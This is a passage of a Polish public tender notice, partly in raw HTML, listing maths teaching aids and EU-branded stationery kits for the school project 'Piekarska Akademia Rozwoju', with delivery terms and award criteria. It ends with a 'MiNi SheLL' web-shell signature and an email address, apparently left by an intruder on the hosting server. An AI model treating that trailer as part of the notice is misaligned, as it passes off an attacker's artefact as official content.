7.	Wagi laboratoryjne	2 szt.	- zakres ważenia min. 7500g z dokładnością min. 0,1g,
- powierzchnia ważenia oraz szalka wykonane są ze stali szlachetnej,
- powierzchnia platformy  min. 18x18 cm,
- waga posiadająca funkcję zliczania,
- zasilanie zarówno z baterii oraz sieci.
8.	Zestaw do nauki tabliczki mnożenia	1 szt.	- tuba Pitagorasa tabliczka mnożenia nauka.

9.	Zestaw do mierzenia, liczenia i klasyfikacji	1 zestaw	zestaw składa się z:
- zestawu min. 60 figur do klasyfikacji klocki różnią się od siebie kolorem, kształtem, wielkością i grubością,
- zestawu liczmanów kolorowych, 250 szt, 6 kolorów, średnica krążka min. 19mm.

10.	Puzzle 3D	1 zestaw	- zestaw składa się z 4 różnych zestawów puzzli 3D: 216 el. latarnia morska w nocy, 66 el. Wieża Eiffla Paryż, 216 el. Krzywa Wieża Piza, 540 el. Kula Ziemska.
11.	Kalkulator	1 szt.	- duży, dwunastopozycyjny wyświetlacz,
- biurowy, podręczny,
- podwójne zasilanie.
12.	Cyrkle/ przybory geometryczne	1 zestaw	- zestaw geometryczny, min. 10  elementowy w metalowym pudełku zawierający: cyrkiel na grafity, cyrkiel z uniwersalnym uchwytem, linijkę,
2 ekierki, kątomierz, gumkę, ołówek, grafity, temperówkę.

13.	Modele brył obrotowych	1 zestaw	- zestaw zawiera min. 6 brył geometrycznych: walec z zaznaczonymi, przekątnymi i wysokością, walec z płaszczyznami, stożek z zaznaczonymi przekątnymi i wysokością, stożek z płaszczyznami, kula z płaszczyznami, przekrojem i promieniem, kula z przekątnymi,
- wysokość brył min.: 17 cm.
14.	Domino matematyczne	1 szt	- zestaw zawiera min. 4 układanki (komplety domina),
- każdy zestaw zawiera min. 24 kostki domina (8 x 4cm),
- wykonane z grubego tworzywa,
- w pudełkach.
15.	Przyrządy do nauki o zbiorach i okręgach	1 zestaw	- zestaw składa się z: 
Okręgi  zbiory, komplet min. 15 sztuk plastikowych, składanych okręgów, średnica okręgów min. 25cm, min. 3 kolory (min. po 5 sztuk każdego).
Liczmany kolorowe owoce, 108 sztuk w wiaderku.
16.	Linijka i ekierki magnetyczne	1 zestaw	- linijka, magnetyczna, długość 100c0m,
- ekierka tablicowa, magnetyczna, 45x45x90cm,
17.	Gra bingo	1 szt	- gra planszowa Bingo, Lotto.
18.	Tabliczka mnożenia	1 szt	- drewniana
- wymiary min. 21cm x 21cm
-składająca się z min. 81 elementów, gdzie na 1 stronie znajduje się działanie  a z drugiej rozwiązanie
19.	Zestaw do mierzenia jednostek i objętości	1 zestaw	- zestaw składa się z:
Kompletu min. 5 klepsydr małych, wys. min. 9 cm,
Odważników 1-5-10-20 gramowych, min. 76 szt,
Waga ze zbiornikami min. 0,5  litrowymi,
Pojemniki do pomiaru objętości, komplet 6 pojemników, wysokość 11cm.


<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162000-5, 39162100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie nr 4: Opracowanie, wykonanie oraz dostarczenie 357 kompletów materiałów ogólnych z logo unijnym dla uczestników zajęć wyrównawczych z j. obcych, informatyki i matematyki w ramach projektu  Piekarska Akademia Rozwoju dofinansowanego ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego  Województwa Śląskiego na lata 2014-2020  (Europejskiego Funduszu Społecznego).<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W ramach zadania zostanie opracowanie, zakupione i dostarczone 357 kompletów materiałów ogólnych z logo unijnym składających  się z: segregatora  w twardej oprawie format A4, zeszyt (format A4, min 64 kart. w kratkę)  i długopisu w metalowej oprawie. oznaczone zgodnie z aktualnymi Wytycznymi dotyczącymi oznaczania projektu  w ramach Programu Operacyjnego Kapitał Ludzki. Na segregatorze, zeszycie i długopisie muszą  być umieszczone oznaczenia projektu zgodne z dokumentem Podręcznik wnioskodawcy    i beneficjenta programów polityki spójności 2014-2020 w zakresie informacji i promocji.  Na długopisie oznaczenia z logami unijnymi w negatywie.
Zleceniodawca musi zaakceptować opracowanie graficzne materiałów, które przekaże przed wykonaniem przedmiotu umowy Wykonawca. 
Wykonawca dostarczy komplety do Biura Projektu Piekarska Akademia Rozwoju, ul. Bytomska 84, pokój 216.
Wykonawca zobowiązany jest wykonać przedmiot umowy w terminie wskazanym w ofercie, maksymalnie do 14 dni od dnia podpisania umowy.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>39162000-5, 39162100-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 14<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com